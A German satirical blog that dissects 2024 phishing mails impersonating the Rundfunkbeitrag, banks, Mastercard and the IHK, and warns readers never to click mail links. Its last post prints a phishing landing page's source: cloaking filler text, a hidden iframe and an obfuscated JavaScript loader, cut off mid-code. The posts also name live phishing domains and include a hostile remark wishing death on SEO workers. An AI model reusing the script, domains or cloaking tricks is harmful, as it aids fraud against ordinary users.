Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.


Kategoriearchiv „Phishing“

Das muss man wohl hinnehmen, da kann man nichts machen…

Montag, 22. Juli 2024

Hier geht es nicht um eine Spam, sondern um eine aktuelle Meldung der Tagesschau, die im Kontext interessant ist.

Es ist ja journalistisches Sommerloch, und da kann es schon einmal passieren, dass sogar in der Tagesschau der ARD mal eine Meldung mit lebenspraktischer Relevanz auftaucht, die keine Wettervorhersage und keine Wetterwarnung ist. Zum Beispiel dieser Hinweis auf die real existierende Internetkriminalität im Jahr 2024, die immer noch Opfer findet, obwohl die Maschen der Trickbetrüger einen dreißig Jahre lang gewachsenen Bart haben [Archivversion der Tagesschaumeldung]:

Eine 57-Jährige aus Dannenberg (Landkreis Lüchow-Dannenberg) hat nach einer Phishing-Mail ihre Bankdaten angegeben und dadurch mehr als 100.000 Euro verloren.

100.000 Euro sind ziemlich viel Geld, für das ein Mensch ziemlich viel arbeiten muss, bis sie zusammenkommen. So schnell kann es gehen.

Am Samstag hatte die Frau eine E-Mail erhalten.

Ich vermute mal, diese Mail war nicht digital signiert und sah nicht wesentlich anders als andere Phishingmails aus. Wenn persönliche Daten dieser Frau – wegen des „real existierenden“ Datenschutzes – verfügbar waren, kam die Spam vermutlich sogar mit einer persönlichen Ansprache, und vielleicht sogar mit einer passenden Kontonummer. Es ist immer eine gute Idee, mit der Preisgabe von Daten über ein anonymisierendes, technisches Medium sehr zurückhaltend zu sein.

Darin wurde sie nach Angaben der Polizei aufgefordert, ihre Kontodaten zu aktualisieren.

Ich sage es ja, es war wohl eine ganz normale Phishingspam. Als ob es für die Banken irgendeinen Nutzen haben könnte, wenn man Daten, die der Bank längst bekannt sind, noch einmal auf einer Website eingibt. Trotzdem fallen immer wieder Menschen darauf herein, was übrigens auch ein Spiegelbild der kommunikativen Leistung von Bankhäusern gegenüber ihren Kunden und Kundinnen ist. Aber jetzt erfahren wir einmal, was danach passiert:

Kurz danach habe die Frau einen Anruf ihres vermeintlichen Bankberaters erhalten. Dieser gab an, wegen eines Sicherheitsproblems das Bankkonto verifizieren zu müssen. Während der angeblichen Verifizierung habe die 57-Jährige mehrfach ihre Bankdaten angegeben, teilte die Polizei mit. Dadurch konnten bislang unbekannte Täter Geld im niedrigen sechsstelligen Bereich vom Konto abbuchen

Zum Glück für uns alle gibt es einen ganz einfachen, kostenlosen und hundertprozentig sicheren Schutz vor Phishing, der häufigsten Kriminalitätsform im gegenwärtigen Internet: Niemals in eine E-Mail klicken!

Wenn man nicht in eine E-Mail klickt und auch keinen Anhang öffnet, kann einem kein Verbrecher einen giftigen Link unterschieben. Stattdessen einfach ein Lesezeichen für häufig besuchte Websites im Browser anlegen und diese Websites nur über dieses Lesezeichen aufrufen. Hätte sie ganz normal die Website ihrer Bank aufgerufen und sich dort wie gewohnt angemeldet, dann hätte sie gesehen, dass das in der Spam behauptete Problem gar nicht existiert. Sonst hätte sie ja einen entsprechenden Hinweis bekommen. Sie hätte damit einen dieser gefürchteten „Cyberangriffe“ abgewehrt. So einfach geht das. Macht das! 🛡️

Das ist leider die eine lebenspraktisch wichtige Information, die man diesem Tagesschauartikel nicht entnehmen kann. Und wegen dieses Mangels an Aufklärung durch journalistische Medien aller Art ist es sicher, dass Phishing auch in vielen Jahren noch eine zuverlässige Einnahmequelle für solche Trickbetrügerbanden sein wird. Obwohl es eine sehr einfache, keinerlei technische Kenntnisse erfordernde Möglichkeit gibt, sich davor zu schützen. Natürlich ohne jeden Komfortverlust, denn es bleibt ja einfaches Klicken. Nur eben nicht in eine Mail.

Und das finde ich sehr schade. Ich bin nämlich kein Trickbetrüger. Sonst wäre ich froh über solche Artikel, die dafür sorgen, dass ich mich auch in den nächsten Jahren nicht nach einer anstrengenden Arbeit umschauen müsste, sondern mir einfach mit einem fiesen Trickbetrug das Geld anderer Leute unterm Nagel reißen könnte.

Deshalb schreibe ich das schon seit Jahren so. Ich bin ja auch kein Journalist, dem die Leser völlig egal zu sein scheinen… 😐️

Man kann die Sicherheit vor Phishing mit einem ganz einfachen Trick übrigens noch weiter erhöhen: Einfach eine eigene Mailadresse für den Kontakt zur Bank einrichten, die man nirgends anders verwendet oder angibt. Dann wird man eine Phishingspam sofort an der falschen Empfängeradresse erkennen.

Auch darauf weist die Tagesschau nicht hin.

Es ist der Redaktion der Tageschau gleichgültig. Eigentlich ist das schon ein bisschen traurig. Wofür schreiben die eigentlich?

Der Rund funk bei trag

Freitag, 28. Juni 2024

⚠️ Diese Mail kommt nicht vom Beitragsservice. Es ist eine Spam. Es ist ein Phishingversuch. Trickbetrüger versuchen, die Empfänger der Spam zu überrumpeln, damit sie ihre Kreditkartendaten eingeben. Wer darauf reinfällt, hat den Schaden. Bitte einfach den Müll löschen! ⚠️

Deppen Leer Zeichen ins Ex Trem treiben? Spammer: Ja.

Von: Deutschlandradio Beitragsservice <ruckerstattung@mta.blackbirdsrising.com>

$ whois blackbirdsrising.com | grep ^Registrar
Registrars.
Registrar WHOIS Server: whois.tucows.com
Registrar URL: http://tucowsdomains.com
Registrar Registration Expiration Date: 2028-05-01T18:05:02
Registrar: TUCOWS, INC.
Registrar IANA ID: 69
Registrar Abuse Contact Email: domainabuse@tucows.com
Registrar Abuse Contact Phone: +1.4165350123
$ _

Das sieht nicht nach Rundfunk aus der Bundesrepublik Deutschland aus.

Der Rund­funk­bei­trag

Das habt ihr schon im Betreff geschrieben.

Sehr geehrte Damen und Herren,

Ja, eines von beiden bin ich. Mein Name oder gar meine Teilnehmernummer sind den Absendern nicht bekannt.

wir möchten Sie darauf hinweisen, dass wir bisher keine Antwort auf unsere vorherigen Nachrichten von Ihnen erhalten haben.

Eure Nachrichten von mir? Ach, da hat nur der Stilexperte ein kleines Nickerchen gemacht. Nee, ich habe eure angeblichen Nachrichten nicht beantwortet. Weil sie gar nicht gekommen sind. Um was geht es überhaupt? Um den Rundfunkbeitrag?

Wir bitten Sie daher, um­ge­hend zu reagieren.

Ich bitte euch, mir umgehend den Buckel runterzurutschen. Aber freundlich und höflichst.

Es besteht die Möglichkeit, dass Ihnen eine Rück­er­stat­tung zusteht, falls Ihr Konto über­bezahlt wurde oder wenn eine Fehl­buchung vorliegt. Wir möchten sicherstellen, dass Sie alle notwendigen Informationen erhalten und eventuelle Ansprüche geltend machen können.

Aber der so genannte Rundfunkbeitrag wird doch ganz bequem per Bankeinzug abgezockt, jedenfalls in den meisten Fällen. Und der Betrag dieser „Quasisteuer auf das Bewohnen einer Wohnung zur Finanzierung eines politisch in genau dieser Form parteiübergreifend gewollten, absurd aufgeblähten und weitgehend redundanten Rundfunkbetriebes als Anstalt zur Alimentation der Günstlinge der Parteienoligarchie der Bundesrepublik Deutschland“ ist doch für alle gleich teuer.

In der heutigen Zeit ist es wichtig, dass alle relevanten Informationen rechtzeitig zur Verfügung stehen.

Oh, heute erst? Ich will nach gestern zurück!

Deshalb ist es unser Anliegen, Ihnen umfassend und zeitnah Auskunft zu geben, damit Sie stets gut informiert sind.

Schön, dass ihr inzwischen sogar eines dieser modernen angelernten neuronalen Netzwerke benutzt (von Journalisten, Politikern und anderen Nichtsblickern meist mit dem Reklamewort „künstliche Intelligenz“ bezeichnet), um weitschwafelige und verblüffend inhaltsleere Texte in meist glatter Formulierung generieren zu lassen. Aber so viel völlig nichtssagender Bullshit steht in keinem halbwegs offiziellen Brief. Und auch in keiner halbwegs offiziellen Mail.

Bitte klicken Sie auf den untenstehenden Button, um den Status Ihrer Rück­er­stat­tung zu über­prüfen.
Rück­er­stat­tungsstatus über­prüfen

Natürlich ist es kein direkt gesetzter Link, es ist ja eine Spam:

$ location-cascade https://cultivatingspirituality.org/enginestart
     1	https://cultivatingspirituality.org/enginestart/
     2	https://derrundfunkbeitrag.com/dradio/
     3	form.php
$ surbl derrundfunkbeitrag.com
derrundfunkbeitrag.com	okay
$ _

Wegen dieser indirekten Verlinkung steht die Domain, in der die Phishingseite gehostet wird, im Moment noch auf keiner Blacklist. Die Phishingseite ist relativ gut gemacht (ich habe zumindest schon viel Schlimmeres gesehen) und sieht so aus:

Screenshot der Phishing-Seite: Apps und Dienste -- Hilfe -- Handicap -- Rückerstattung -- Nach einer Überprüfung Ihrer letzten Zahlungen haben wir festgestellt, dass Sie für zwei Monate zu viel Rundfunkgebühren gezahlt haben. Sie haben Anspruch auf eine Rückerstattung in Höhe von 36.72 €. -- Bitte beachten Sie, dass Sie Ihren Anspruch auf Rückerstattung verlieren könnten, wenn Sie ihn nicht so schnell wie möglich geltend machen. Wir empfehlen daher, unverzüglich zu handeln. -- Um die Rückerstattung zu bearbeiten, bitten wir Sie, Ihre Informationen auszufüllen. Dies ist notwendig, um den Betrag korrekt auf Ihr Konto überweisen zu können. -- Erstattungsinformationen -- Voller Name -- Straße -- Postleitzahl -- Stadt -- Telefonnummer -- Erstattungsnummer: RS6554456696 -- Betrag: 36.72 € -- Datum: 27/06/2024 -- Kartendaten -- Kartennummer, MM/JJ, CVV -- Gesamt 36.72 €

Die Daten, die man eingibt, gehen direkt an Kriminelle. Mit der Kreditkarte werden alle möglichen Geschäfte gemacht. Das Geld anderer Leute gibt sich nun einmal viel einfacher aus. Da hält sich ein Betrüger doch nicht beim Durchkaufen zurück.

Eine wirkliche Schwäche dieses Phishingversuches ist es übrigens, dass die Teilnehmernummer weder eingegeben werden muss (am besten noch vor der Angabe, wie viel Geld angeblich erstattet wird) noch irgendwo angezeigt wird. Frei nach dem Motto: Wer braucht schon eine Teilnehmernummer, wenn er doch so eine schöne Kreditkartennummer hat? Das wird jemanden, der ein bisschen wacher ist, auf der Stelle skeptisch machen. Leider sind viele Menschen eher nicht so wach. Die Masche ist neu. Ich befürchte, sie wird relativ viele Opfer finden.

Menschen, die richtig wach sind, klicken gar nicht erst in eine Mail, weil das der beste Schutz vor fast allen Formen der Kriminalität im Internet ist. Der Beitragsservice hat eine leicht zu findende Website. Dort wird man durch einen kurzen Blick auf die dort verfügbaren Formulare schnell feststellen, dass es kein Verfahren zur Rückerstattung gibt. Das wäre angesichts des Bankeinzugs auch sonderbar. Nach dieser Feststellung kann man den Müll einfach löschen. Cyberangriff abgewehrt. So einfach geht das! 🛡️

Mit freundlichen Grüßen,
Ihr Rund­funk­beitrag-Team

Freundlich wie ein Kackhaufen vor der Haustür
Eure Trickbetrügerbande

Rund­funk­beit­rag Service Center
A­RD ZD­F Deuts­chl­andr­adio Bei­tragsservice 50656 Köln
Telefon: 01806999 55510
E-Mail: info@r­undfunkbei­trag­.­de

Nein, die haben das ganz sicher nicht geschrieben. Die Mail wurde über eine IP-Adresse aus der gequälten Ukraine versendet.

Diese E-Mail enthält wichtige Informationen zur Rück­ersta­tt­ung Ihres Ru­ndfunkb­eit­rags. Bitte überprüfen Sie Ihre E-Mails regelmäßig und stellen Sie sicher, dass Sie keine wichtigen Nachrichten verpassen.

Diese E-Mail lag im Spamordner schon ganz richtig. Ich hoffe, sie wurde und wird auch woanders automatisch aussortiert.

Erinnerung: Aktivieren Sie Gebührenfrei Mastercard Identity Check!

Freitag, 21. Juni 2024

Habe ich schon mal gesagt, dass es im Moment eine Menge Phishing gibt? 🎣️

Diese Spam hat weder etwas mit Mastercard noch etwas mit…

Von: No-reply@miles-and-more.com

…dem Vielfliegerprogramm der Lufthansa, das mit der Marke „Miles & More“ beworben wird, zu tun. Es ist eine Spam von Trickbetrügern. Von völlig unfähigen Trickbetrügern übrigens, denn sie haben „eine Kleinigkeit“ in ihrer Spam vergessen:

Willkommen zur Registrierung für Gebührenfrei Mastercard® Identity Check™

Sehr geehrte Damen und Herren,

Mastercard® Identity Check™ ist ein von Mastercard® entwickelter Sicherheitsstandard für Kreditkartenzahlungen, der darauf abzielt, das Risiko von Kartenmissbrauch deutlich zu minimieren.

Ab sofort müssen nahezu alle Online-Zahlungen nach Eingabe Ihrer Kartendetails durch die zusätzliche Bestätigung mittels einer mTAN (per SMS) und eines persönlichen Passworts von Ihnen autorisiert werden. Dies gewährleistet einen zusätzlichen Schutz vor unbefugter Nutzung Ihrer Kreditkarte. Dieses Verfahren steht für eine sichere Transaktion auf beiden Seiten.

Ja, das war die ganze Spam.

Der Link auf die Phishingseite fehlt. Es ist ja nur das Wichtigste an einer Phishingspam. Er findet sich übrigens auch nirgends im Quelltext der Spam, stattdessen…

[…]

<p style="margin: 0px;"><font color="#000000"><font face="Lucida Sans Unicode"><font color="#000000" face="Arial"><font face="Lucida Sans Unicode">Mastercard® Identity Check™ ist ein von Mastercard® entwickelter Sicherheitsstandard für Kreditkartenzahlungen, der darauf abzielt, das Risiko von Kartenmissbrauch deutlich zu minimieren.</font></font></font></font></p>

<p style="margin: 0px;"><font color="#000000"><font face="Lucida Sans Unicode"><font color="#000000" face="Arial"> </font></font></font></p>

<p style="margin: 0px;"><font color="#000000"><font face="Lucida Sans Unicode">Ab sofort müssen nahezu alle Online-Zahlungen nach Eingabe Ihrer Kartendetails durch die zusätzliche Bestätigung mittels einer mTAN (per SMS) und eines persönlichen Passworts von Ihnen autorisiert werden. Dies gewährleistet einen zusätzlichen Schutz vor unbefugter Nutzung Ihrer Kreditkarte. Dieses Verfahren steht für eine sichere Transaktion auf beiden Seiten.</font></font></p>

<p style="margin: 0px;"><br />
<font color="#000000"><font face="Lucida Sans Un

…hört die Spam einfach mitten in einem <font>-Tag auf. Vermutlich ist den Spammern ein kleiner Unfall mit der Zwischenablage passiert. 😁️

Na, vor rd. einem halben Jahr hat es ja noch geklappt mit der Spam fürs Klickmich. Wenn man nicht so genau versteht, was man da macht, weil dieser Technikkram doch immer so hirnt und man Computer doch eigentlich nur zum Betrügen anderer Leute benutzen will, dann wird die gesamte Datenverarbeitung eben Glückssache. 🍀️

Die naheliegende Frage, warum die Spammer einerseits das seit Jahren aus guten Gründen¹ obsolete <font>-Tag verwenden, um andererseits auch mit CSS zu formatieren, kann vermutlich nur der Hirnklempner der Spammer erklären. Ich finde mich in den fremdartigen, exotischen und bizarren Gedankengängen dieser Leute nicht zurecht.

Oh, der Hirnklempner war schon da? Der Kopf ist jetzt mit übelriechender brauner Flüssigkeit gefüllt? Das erklärt es natürlich auch. 💩️

¹Dieses HTML-Tag hat Inhaltsauszeichnung und Formatierung für die Darstellung vermischt, was keine gute Idee war und zu sehr schwer pfleg- und anpassbaren HTML-Quelltexten führte. Es ist heute völlig unnötig, und niemand weint diesem Trümmer aus der Vergangenheit hinterher. Ich habe es vor rd. 15 Jahren das letzte Mal gesehen.

Sofortiges Eingreifen erforderlich

Samstag, 15. Juni 2024

Puh, sehe ich gerade eine Menge schlecht gemachten Phishings. Mal eine Spam davon rauspicken. 🎣️

Von: DКB <chaumetefdiaverb@gmx.com>

So unterzeugend sah schon lange keine Absenderadresse mehr nach einem Kreditinstitut aus. Schade, dass sich diese DKB keinen eigenen Mailserver leisten kann. Die Spam wurde übrigens wirklich über GMX versendet. Und der Quelltext der Spam sieht wie ein heiterer Gruß aus dem vergangenen Jahrhundert aus. Ach ja, wo ich gerade beim Quelltext bin, der fängt übrigens hiermit an:

<p><img alt="" border="0" style="display: block;" width="1"/></p>

Mit Stable Diffusion generiertes BildJa richtig. Das sieht aus, als sollte es ein Webbug werden, aber leider war der Absender ein bisschen mit der Vorlage für seine Spam überfordert. Deshalb hat er vor dem Absenden gar nicht mehr mitbekommen, dass da die Angabe der URI des nachzuladenden Bildes im Attribut src fehlt. So wird das natürlich nichts mit dem „nach Hause telefonieren“. Vielleicht macht der Honk es ja bei seinem nächsten Versuch besser, nachdem er sich darüber gewundert haben wird, dass seine Spam nirgends angekommen zu sein scheint. Am Ende sind ja doch immer alle schlau, die einen waren es vorher, die anderen sind es hinterher. 😁️

dkb

Hier sollte vermutlich das Logo der DKB erscheinen. Das Bild wurde anonym und kostenlos bei Postimages gehostet, aber dort schon wieder entfernt. Es kann ja auch nicht jeder so untätig wie Evil Google sein, wenn es um den Missbrauch der kostenlos angebotenen Dienstleistungen durch Trickbetrüger geht.

Guten Tag,

Aber ganz genau mein Name! Und meine Kontonummer! 👍️

um unseren gesetzlichen Verpflichtungen nachzukommen und Sie bestmöglich zu betreuen, bitten wir Sie, Ihre persönlichen Daten zu aktualisieren. Melden Sie sich bitte in Ihrem Banking an, um Ihre Daten zu überprüfen und gegebenenfalls anzupassen. Bei Gemeinschaftskonten nutzen Sie bitte Ihre eigenen Zugangsdaten.

KONTO AKTUALISIEREN

So schade, dass man diesen Banken aus dem Spameingang immer wieder noch mal alles erzählen muss, was diese Banken schon lange wissen. Vielleicht sollten diese Spambanken mal lernen, wie das mit der Datenverarbeitung so funktioniert.

Natürlich gehen alle Daten, die man angibt, direkt zu Betrügern. Es ist Phishing. Deshalb klickt man ja auch nicht in eine Mail, sondern ruft solche Websites immer über ein Lesezeichen im Webbrowser von Hand auf. So kann einem kein Betrüger oder sonstiger Verbrecher einen giftigen Link unterschieben. So einfach ist es, sich vor den gefürchteten Cyberangriffen zu schützen. Macht das! 🛡️

Ansonsten hätte der Link in eine Domain geführt…

$ surbl 74sin88.top
74sin88.top	LISTED: PH ABUSE 
$ _

…die bereits wegen Spam und Trickbetrugs auf allen Blacklists dieser Welt steht. Die meisten modernen Webbrowser sollten hier eine deutliche Warnung anzeigen. Aber darauf kann man sich nicht verlassen, die Blacklists hinken immer ein paar Stunden hinterher. Sicherer ist es, gar nicht erst in eine Mail zu klicken. Dann kann man auch nicht dazu überrumpelt werden, auf einer betrügerischen Website etwas sehr Dummes zu tun.

Mit freundlichen Grüßen
Ihre DKB

Die Freundlichkeit dieser betrügerischen Phisher wird nur noch von ihrem Anstand und ihrer Ehrlichkeit überboten.

A k t u al i s i er en Sie I hr K o n t o #6354996553

Samstag, 15. Juni 2024

Abt.: Ganz schlechtes Phishing 🎣️

Was ist das denn für eine lustige Nummer im Betreff? Soll das etwa meine Kontonummer sein? Na, alle zehn Milliarden Versuche wird mal richtig geraten…

cοmdirect

Sehr gee­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­hrter Κυnde, gammelfleisch@tamagothi.de

Ich bin kein Kunde der comdirect. Diese Spam geht an jede Mailadresse, die nicht bei drei auf den Bäumen ist. Die hier zugespammte Adresse wurde kürzlich mit einer trojanischen App vom so genannten „Smartphone“ eines flüchtigen Bekannten mitgenommen und wurde bis dahin von mir nur für die persönliche Kommunikation benutzt.

借助人工智慧的力量提高您的網站排名和客戶數量 從內容創建到圖像生成——人工智慧技術是當前報告不可或缺的一部分,並提供了各種提高效率和降低成本的機會。

Ja?

Um die Sicherheit unserer Kunden zu gewährleisten, haben wir kürzlich eine Reihe wichtiger Systemaktualisierungen durchgeführt. Der wichtigste Aspekt von photoTAN ist, dass es auch über verbesserte Sicherheitsfunktionen verfügt, die die Sicherheit Ihres Kontos weiter erhöhen sollen.

Echt jetzt? Das ist ja toll, das „ihr“ so viel für meine Sicherheit macht. Da brauche ich selbst ja gar nix mehr zu tun. Oder?

ρrοfil aΚtυαlisieren

Aha, die verändern etwas, und ich muss deshalb aktiv werden und in eine Mail klicken. So schade, dass diese Banken sich gar nicht mit Datenverarbeitung auskennen.

Natürlich geht der Link nicht zur Website der comdirect. Ist ja klar. Es ist ja Phishing. Daten, die man dort eingibt, gehen direkt an Verbrecher. Zum Glück kann man sich da einfach gegen schützen, indem man niemals in eine E-Mail klickt. Dann kann einem so ein Trickbetrüger auch keinen giftigen Link unterschieben. Stattdessen einfach ein Lesezeichen für die Website der Bank im Webbrowser anlegen und diese Website nur über das Lesezeichen aufrufen! So einfach geht Computersicherheit. 🛡️

Oh, schön! Der Hoster hat die Phishingsite schon vor meiner Meldung aus dem Web entfernt. Dabei hatte ich von Strato gar nicht so eine gute Meinung. Aber gegen den Missbrauch ihrer Dienstleistungen durch Betrüger gehen sie dort offensichtlich recht zügig vor. Hoffentlich hat Strato Vorkasse genommen!

您可以充分利用基於人工智慧的 SEO 的潛力,從而提高網站的可見度和排名。每月只需​​ 10 歐元,包括 30 天的訂閱

Schön, dass ich wenigstens „SEO“ erkennen kann – und weiß, dass ich daran auch nicht das geringste Interesse habe. So weit kommt es noch, dass ich meine Websites für den Indexer von Google schreibe, statt für menschliche Leser.

Mit Stable Diffusion generiertes BildOb chinesische Spamprosa in deutschsprachigem Phishing wohl so eine gute Idee ist? Ob es wohl eine gute Idee ist, da trotzdem ein „Wort“ drin erscheinen zu lassen, das vermutlich von jedem scharfen Spamfilter aussortiert wird, weil es eigentlich nur in Spam und niemals in Mitteilungen denkender und fühlender Menschen vorkommt? SEO ist übrigens selbst Spam. Hinterhältig, perfide, asozial und gemein. Spam, die sich an die Suchmaschinen richtet, damit Menschen nicht mehr finden, was sie suchen, sondern was solche Spammer sie finden lassen wollen. Damit die naiven Opfer dieser Spam an einer Stelle überrascht werden, an der sie überhaupt nicht mit Spam rechnen. Google ist übrigens unter der Last der SEO-Spam so gut wie unbrauchbar geworden. Wenn sie das nächste Mal einem Menschen begegnen, der ihnen erzählt, dass er in „SEO“ macht, geben sie ihm bitte ein deutliches und unmissverständliches negatives soziales Feedback, und zwar so unfreundlich und abweisend, wie es gerade noch im Rahmen der geltenden Gesetze möglich ist. Es handelt sich um einen widerwärtigen Spammer, dem für eine Handvoll Geld alle Grundlagen eines halbwegs erträglichen Miteinanders egal sind. Wenn er stirbt, wird die Welt ein kleines bisschen besser und das Internet ein kleines bisschen benutzbarer.

Die Nichtbeαchtυng des Verfαhrens kαnn zυr Sρerrυng des Κοntοs führen.

Nötigung nennt man so etwas im StGB. Allein an so einer strafrechtlich relevanten Formulierung aus der Stubs- und Schubshölle der Internettrickbetrüger kann man ganz klar sehen, dass man es nicht mit einem Kreditinstitut, sondern mit Kriminellen zu tun hat.

Vielen DanΚ, dαss Sie Ihre Informαtionen αυf dem neuesten Stαnd hαlten.

Vielen Dank, dass sie sich für nichts bedanken! Vor meinem Arsch ist übrigens auch kein Gitter! 👅️

Mit freυndlichen Grüßen,
Ihr Cο­­­­­­­­m­­­­­­­­dir­­­­­­­­ect Β­­­­­­­­αn­­­­­­­­Κ A­­­­­­­­G T­­­­­­­­eα­­­­­­­­m

Das muss dieses „Team“ sein, das in deutscher Sprache Kunden nötigt, aber die deutschen Buchstaben teilweise durch ähnlich aussehende griechische Buchstaben ersetzt hat, weil… ähm… weil es sonst zu deutsch aussieht (und damit blinde und schwer körperbehinderte Menschen mit ihren Hilfsmitteln einen ziemlichen Kauderwelsch vorgetragen bekommen), um dann völlig kontextlos chinesische Reklame für irgendwelche SEO-Dienstleistungen zwischen die Absätze zu klecksen.

他们是不是有点傻?

Henning Ratjen
Leiter Service

Hier spammt der Leiter noch selbst.

Bitte beαchten Sie, dass diese E-Mail αυtomatisch erstellt wυrde υnd nicht beαntwortet werden sοllte.

Mache ich. Ist schon gelöscht. 🗑️

¹Die Mail ging im Original an eine Adresse, die ich nicht öffentlich im Web nennen möchte.

Dringende Bitte: Aktualisieren Sie Ihre Daten bei der IHK, um eine Deaktivierung zu vermeiden

Freitag, 24. Mai 2024

Hui, 31,38 Punkte vom rspamd sind schon ziemlich sportlich! Ab fünf Punkten gehts bei mir automatisch ins Klo. Diese Spam sollte also beinahe nirgends ankommen. Sie ist auch nicht neu. Das Phishing läuft schon ein paar Monate. Die IHK hat nichts mit dieser Spam zu tun.

Der heutige Phishingmüll liest sich so:

Aktualisieren Sie Ihre Daten

Sehr geehrter Unternehmer,

Genau mein Name!

unsere Unterlagen zeigen, dass die Kontaktdaten Ihres Unternehmens in unserem System nicht korrekt aktualisiert wurden. Nach deutschem Recht sind alle deutschen Unternehmen verpflichtet, der IHK korrekte Kontaktdaten zur Verfügung zu stellen.

So schade, dass diese IHK nicht in ihren Unterlagen gelesen hat, wie „mein Unternehmen“ firmiert. Aber meinen Namen kennen sie ja auch nicht. Und nicht einmal meine IHK-Mitgliedsnummer. Schließlich muss der Text für alle passen. Es ist ja Spam.

Wir haben in den vergangenen Monaten wiederholt versucht, mit Ihnen Kontakt aufzunehmen, um dieses Problem zu lösen, bisher jedoch ohne Erfolg. Daher möchten wir Sie bitten, Ihre Kontaktdaten bis zum 28. März zu aktualisieren. Nach diesem Datum wird Ihre IHK-Geschäftsnummer vorübergehend gesperrt, bis die erforderlichen Angaben aktualisiert sind.

Daten aktualisieren

Diese IHK aus der Spam verlangt von den geehrten Unternehmern, dass sie irgendwo eine Zeitmaschine herumstehen haben, um die vor 57 Tagen abgelaufene Frist noch einhalten zu können. Schon schade, wenn man keinen Kalender hat. 🤣️

Tja, wenn so ein Spammer einfach einen Text eines anderes Spammers übernimmt, ohne auch nur ein Wort davon zu verstehen, kann es schon mal sehr peinlich und komisch werden.

Der Link ist dafür mal wieder gruselig:

$ location-cascade "https://pagead2.googlesyndication.com/pcs/click?xai=AKAOjstcG36prDtdoS2okMxVgxBrk_iyWIOWBgkUjbtA_o_KC6AAxpcngrf3ZPUJMrLKSGn0a7sSKUDweHGHe2tfdFSwr0NVbaRFXj6vfway_elkEjTTrYsemn2dNqwzh8nJAYZBV_pGMOUy7csh-X6geT2dsg83QzEfauiDTP2T0cusutL9NL_qwU6Z9CHRch1evOqIl_L3D2dn3ikPeI-RDKeqjAFaKUFT02b1kcxHsEP2NGfrRQANe0tc-msxaMnJxZwJMfAGRroRlLX_onvoG5rq2vy47BpFW5VCPzXPDwibFbcNM9GnspsVDtsxpJI33fO9Qin6NdYjTthhUEAENpn6JtpRnHV2xt3jiGBwLgCsSSR35yH7lET4q_w3c2Xk_b5VfwhWPr-jtwCB11vom-6jcaAR9NclKdW5UtHIMdZQ&sig=Cg0ArKJSzHM2MuVtVRia&fbs_aeid=%5Bgw_fbsaeid%5D&adurl=https://seaweb.grupoptg.com/shoeshine"
     1	https://seaweb.grupoptg.com/shoeshine
     2	https://seaweb.grupoptg.com/shoeshine/
$ lynx -dump https://seaweb.grupoptg.com/shoeshine/
   psychogenic julius debt confluence bake

   unscheduled binders abbreviated hiltop scoreboard comedy

   crisis chopped sterilize coldstart abstractly placation meta gutter

   basalt requiry referencing refit request saviour

   misjudge intermix harmonious diadem trapeze union

   edited disapproving obligor unacquainted

   demonology margarine revoked crystal incise toluene

   alliteratively nosebleed phantom inclusiveness combination sequester
   stimulations complacency
$ lynx -source https://seaweb.grupoptg.com/shoeshine/ | grep location
<div></div><div style='font-size: 0.00000000009%;'>psychogenic julius debt confluence bake</div><b></b><i></i><p></p><i></i><span></span><i style='font-size: 0.0000000006%;'>unscheduled binders abbreviated hiltop scoreboard comedy</i><p></p><b></b><p style='font-size: 0.00000000000006ex;'>crisis chopped sterilize coldstart abstractly placation meta gutter</p><p></p><div></div><p></p><p style='font-size: 0.0000000000009em;'>basalt requiry referencing refit request saviour</p><span></span><b></b><div></div><b></b><p></p><span style='font-size: 0.0000000002vw;'>misjudge intermix harmonious diadem trapeze union</span><p></p><div></div><i></i><b></b><p></p><b style='font-size: 0.0000000000004ex;'>edited disapproving obligor unacquainted</b><b></b><p></p><i style='font-size: 0.0000000000007vh;'>demonology margarine revoked crystal incise toluene</i><div></div><p></p><i></i><div></div><b></b><p></p><div></div><div style='font-size: 0.00000000000009vh;'>alliteratively nosebleed phantom inclusiveness combination sequester stimulations complacency</div><div></div><iframe style='display: none;' width='0' height='0' frameborder='0'></iframe><p></p><div></div><i></i><script>const K=I;(function(U,V){const s=I,H=U();while(!![]){try{const q=-parseInt(s('0xd0'))/0×1*(-parseInt(s(0xef))/0×2)+parseInt(s(0xa8))/0×3*(parseInt(s('0xaf'))/0×4)+parseInt(s(0xd8))/0×5*(parseInt(s(0xe8))/0×6)+-parseInt(s('0xe1'))/0×7+parseInt(s(0xbc))/0×8*(-parseInt(s('0xeb'))/0×9)+-parseInt(s(0xc5))/0xa*(-parseInt(s(0xb4))/0xb)+parseInt(s(0xd5))/0xc*(-parseInt(s(0xb1))/0xd);if(q===V)break;else H['push'](H['shift']());}catch(M){H['push'](H['shift']());}}}(v,0×33f3b));function v(){const R=['^;]','11hAWDDv','eZo','toG','*)(','kie','556152tzojYd','res','mat','5IDMQWh','ten','dri','; e','coo','has','tDo','pla','nav','2289777MNBXDt','eTi','Ele','xpi','tWi','tfo','neO','266598AFxPvy','con','ame','511965vzMWke','Tim','ifr','tsB','48930QlAFoz','tor','15oSalvJ','set','iga','web','men','ati','edO','324532ufGaQW','gNa','26zUyHbf','meF',';pa','4213PJsssa','ezo','tri',';) ','get','orm',';|$','ndo','48oQCgpz','tim','ons','loc','cum','ent','ver','ffs','(^|','6650BCNTZV','use','olv','yTa','th=','=([','Dat','MTS','pti','rAg'];v=function(){return R;};return v();}function I(U,V){const H=v();return I=function(q,M){q=q-0xa7;let s=H[q];return s;},I(U,V);}let d=-new 